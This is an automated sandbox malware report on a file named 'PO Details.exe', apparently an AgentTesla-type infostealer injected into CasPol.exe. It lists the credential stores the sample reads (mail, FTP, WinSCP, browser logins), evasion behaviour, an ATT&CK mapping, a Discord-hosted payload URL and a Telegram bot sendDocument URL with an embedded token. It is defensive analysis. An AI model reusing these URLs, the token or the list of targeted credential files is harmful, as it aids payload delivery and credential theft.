Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8640D mov eax, dword ptr fs:[00000030h]	1_2_02A8640D
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A91DBB mov eax, dword ptr fs:[00000030h]	1_2_02A91DBB

Source: C:\Users\user\Desktop\PO Details.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_02A900E0 LdrLoadDll,

1_2_02A900E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO Details.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B00000

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

1_2_004034C5

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7460, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7460, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7460, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7460, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7460, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	11 Input Capture	117 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	331 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	21 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	251 Virtualization/Sandbox Evasion	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO Details.exe	24%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll	4%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://WE6eWVYUK6.com	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://vDnRAK.com	0%	Avira URL Cloud	safe
http://WE6eWVYUK6.co	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
https://api.ipify.org%t-	0%	Avira URL Cloud	safe
http://www.avast.com0/	0%	Avira URL Cloud	safe
https://api.ipify.org%%startupfolder%	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb	false	high
https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument	false	high
https://cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://WE6eWVYUK6.com	CasPol.exe, 0000000B.00000003.9327075567.000000001C101000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017146437.000000001D382000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017473743.000000001D39E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017700915.000000001D3B8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://vDnRAK.com	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://WE6eWVYUK6.co	CasPol.exe, 0000000B.00000002.14017146437.000000001D382000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	CasPol.exe, 0000000B.00000002.14017532230.000000001D3A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocumentdocument-----	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%t-	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.avast.com0/	lang-1038.dll.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/	CasPol.exe, 0000000B.00000002.13996125718.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org%%startupfolder%	CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://nsis.sf.net/NSIS_ErrorError	PO Details.exe	false		high
http://api.telegram.org	CasPol.exe, 0000000B.00000002.14017700915.000000001D3B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 0000000B.00000002.14017532230.000000001D3A4000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
162.159.130.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	688673
Start date and time:	2022-08-23 13:19:22 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO Details.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/5@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 35.1% (good quality ratio 34.5%) Quality average: 87% Quality standard deviation: 21.2%
HCA Information:	Successful, ratio: 97% Number of executed functions: 124 Number of non-executed functions: 117
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.123.126.76, 20.23.104.113
Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-4-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-west-4-fe.westeurope.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:21:52	API Interceptor	2750x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	SecuriteInfo.com.W32.AIDetectNet.01.21795.exe	Get hash	malicious	Browse
	#U00d6DEME DETAYLARI.exe	Get hash	malicious	Browse
	G#U00fcnl#U00fck Hesap Hareketleri Bilgilendirmesi.exe	Get hash	malicious	Browse
	Purchase Order No. 1221TVI-1943.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.1238.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetectNet.01.27280.exe	Get hash	malicious	Browse
	RTF-623790286728-902878377278837678838.exe	Get hash	malicious	Browse
	RFQ PO #37886 DOCS.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Barys.40141.13062.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Barys.40141.24455.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.9625.exe	Get hash	malicious	Browse
	3b#U044e.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	GoogleDrive.exe	Get hash	malicious	Browse
	gen_signed.apk	Get hash	malicious	Browse
	GEDYBO9p2O.exe	Get hash	malicious	Browse
	DOCUMENT REVIEW.exe	Get hash	malicious	Browse
	Nuevo orden_________________.PDF.vbs	Get hash	malicious	Browse
	RFQ Quotation Req and company information..exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.61355332.5874.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	file.exe	Get hash	malicious	Browse	162.159.133.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.133.233
	2022.08.23XQuotationXProductionXspecificationXandXdetailsXforXquote.exe	Get hash	malicious	Browse	162.159.135.233
	file.exe	Get hash	malicious	Browse	162.159.135.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	WSkT8d093C.exe	Get hash	malicious	Browse	162.159.133.233
	em1B8DcC72.exe	Get hash	malicious	Browse	162.159.129.233
	JMDc707Z03.exe	Get hash	malicious	Browse	162.159.135.233
	file.exe	Get hash	malicious	Browse	162.159.129.233
	file.exe	Get hash	malicious	Browse	162.159.129.233
	hesaphareketi-01.exe	Get hash	malicious	Browse	162.159.135.233
	Cheat-mod.exe	Get hash	malicious	Browse	162.159.130.233
	quote.exe	Get hash	malicious	Browse	162.159.130.233
	E3135F01A3B76A91BB1082FD5B53259FE2D59EB6AB550.exe	Get hash	malicious	Browse	162.159.133.233
	22nuoItfxs.exe	Get hash	malicious	Browse	162.159.134.233
	l5Pmw9b4cO.exe	Get hash	malicious	Browse	162.159.130.233
	1UFZlH15s7.exe	Get hash	malicious	Browse	162.159.130.233
	IJ101F4eV6.exe	Get hash	malicious	Browse	162.159.133.233
api.telegram.org	SecuriteInfo.com.W32.AIDetectNet.01.21795.exe	Get hash	malicious	Browse	149.154.167.220
	#U00d6DEME DETAYLARI.exe	Get hash	malicious	Browse	149.154.167.220
	G#U00fcnl#U00fck Hesap Hareketleri Bilgilendirmesi.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order No. 1221TVI-1943.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.1238.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.27280.exe	Get hash	malicious	Browse	149.154.167.220
	RTF-623790286728-902878377278837678838.exe	Get hash	malicious	Browse	149.154.167.220
	RFQ PO #37886 DOCS.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Barys.40141.13062.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Barys.40141.24455.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.9625.exe	Get hash	malicious	Browse	149.154.167.220
	3b#U044e.exe	Get hash	malicious	Browse	149.154.167.220
	quote.exe	Get hash	malicious	Browse	149.154.167.220
	GoogleDrive.exe	Get hash	malicious	Browse	149.154.167.220
	GEDYBO9p2O.exe	Get hash	malicious	Browse	149.154.167.220
	DOCUMENT REVIEW.exe	Get hash	malicious	Browse	149.154.167.220
	Nuevo orden_________________.PDF.vbs	Get hash	malicious	Browse	149.154.167.220
	StaxelLauncher.exe	Get hash	malicious	Browse	149.154.167.220
	RFQ Quotation Req and company information..exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.GenericKD.61355332.5874.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	35e67bf049cb9c2d9c6af0f2f29fffef0279a09537322.exe	Get hash	malicious	Browse	149.154.167.99
	bQNf8RW2dd.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetectNet.01.21795.exe	Get hash	malicious	Browse	149.154.167.220
	WSkT8d093C.exe	Get hash	malicious	Browse	149.154.167.99
	em1B8DcC72.exe	Get hash	malicious	Browse	149.154.167.99
	7zJEFojp00.exe	Get hash	malicious	Browse	149.154.167.99
	JMDc707Z03.exe	Get hash	malicious	Browse	149.154.167.99
	wrD996N3B3.exe	Get hash	malicious	Browse	149.154.167.99
	#U00d6DEME DETAYLARI.exe	Get hash	malicious	Browse	149.154.167.220
	G#U00fcnl#U00fck Hesap Hareketleri Bilgilendirmesi.exe	Get hash	malicious	Browse	149.154.167.220
	VNuZFR6FKA.exe	Get hash	malicious	Browse	149.154.167.99
	Purchase Order No. 1221TVI-1943.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.1238.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.27280.exe	Get hash	malicious	Browse	149.154.167.220
	RTF-623790286728-902878377278837678838.exe	Get hash	malicious	Browse	149.154.167.220
	RFQ PO #37886 DOCS.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Barys.40141.13062.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Barys.40141.24455.exe	Get hash	malicious	Browse	149.154.167.220
	sjVwQu6X0B.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Win32.Agent.oas1.9625.exe	Get hash	malicious	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	J85gwJGvE4.exe	Get hash	malicious	Browse	149.154.167.220
	2022.08.23XQuotationXProductionXspecificationXandXdetailsXforXquote.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	SWZ#U007e123456789-0987654323456789-9876-.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.TrojanDownloader.MSIL.Wagex.bb7c8af4.24776.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.21795.exe	Get hash	malicious	Browse	149.154.167.220
	em1B8DcC72.exe	Get hash	malicious	Browse	149.154.167.220
	JMDc707Z03.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Jatommy.7.878.30467.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.5597.exe	Get hash	malicious	Browse	149.154.167.220
	Letter.exe	Get hash	malicious	Browse	149.154.167.220
	isaright.exe	Get hash	malicious	Browse	149.154.167.220
	Ru9vrbei1D.js	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Browse	149.154.167.220
	#U00d6DEME DETAYLARI.exe	Get hash	malicious	Browse	149.154.167.220
	G#U00fcnl#U00fck Hesap Hareketleri Bilgilendirmesi.exe	Get hash	malicious	Browse	149.154.167.220
	Purchase Order No. 1221TVI-1943.exe	Get hash	malicious	Browse	149.154.167.220
	ENtNFTaMX3.exe	Get hash	malicious	Browse	149.154.167.220
	C4Loader.exe	Get hash	malicious	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	EM N#U00b0A0277527.docx	Get hash	malicious	Browse	162.159.130.233
	Recover Messages Now_001842.html	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.Variant.Zusy.436106.1689.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	35e67bf049cb9c2d9c6af0f2f29fffef0279a09537322.exe	Get hash	malicious	Browse	162.159.130.233
	Bulbine40.exe	Get hash	malicious	Browse	162.159.130.233
	613KGEL6gh.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.W32.AIDetect.malware2.1985.exe	Get hash	malicious	Browse	162.159.130.233
	oCvTSJQpVG.exe	Get hash	malicious	Browse	162.159.130.233
	U prilogu je nova narudzba.exe	Get hash	malicious	Browse	162.159.130.233
	https://www.dropbox.com/scl/fi/m2bcwf7pkjzcj063j2zb4/%E2%80%9CNew_APPROVED%22.paper?dl=0&rlkey=c1pj9tgl2wr8kh1pwehzfr8d4	Get hash	malicious	Browse	162.159.130.233
	Inv. PAYMENT Details.js	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	1-HR InvoiceSale Matrix Disc VI-INTANDEM.html	Get hash	malicious	Browse	162.159.130.233
	64#U3164.exe	Get hash	malicious	Browse	162.159.130.233
	NVv4GMgw4W.exe	Get hash	malicious	Browse	162.159.130.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll	PO Details.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll	PO Details.exe	Get hash	malicious	Browse
	Bulbine40.exe	Get hash	malicious	Browse
	Bulbine40.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe	Get hash	malicious	Browse
	SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts\timeydelserne.Med

Download File

Process:	C:\Users\user\Desktop\PO Details.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	28498
Entropy (8bit):	3.9990607026220055
Encrypted:	false
SSDEEP:	768:1RYCj3PlIxF0GNZ0q0vllVuqm5BJ0xSexurAw1:1mM3sF0GTIvns3Bi0Mukw1
MD5:	455619D7A52740A8E2282B920863D463
SHA1:	787F454DBE3B75C9F88A9C8EA997FF2FE6C24168
SHA-256:	9EF9DD4606722AA3F71DB28CD02B88763EE0DB0DA8DBCC6A110914C5165F9AF6
SHA-512:	7FDC2DCDD531BC0259F21E9A6F09C473BBEE15620A4DDAA5ED4B790EBF866708BFEE06F08625C3F901BC10271627BDA933C5F77568D59F96DCF970B3F088D0AA
Malicious:	false
